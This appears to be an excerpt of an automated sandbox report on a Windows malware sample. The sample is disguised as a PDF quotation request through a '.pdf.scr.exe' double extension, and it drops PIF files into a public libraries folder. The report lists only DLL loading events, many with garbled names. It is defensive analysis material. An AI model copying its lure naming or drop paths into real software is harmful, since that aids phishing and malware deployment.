                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: am.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ?.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: version.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: url.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFSection loaded: iertutil.dllJump to behavior
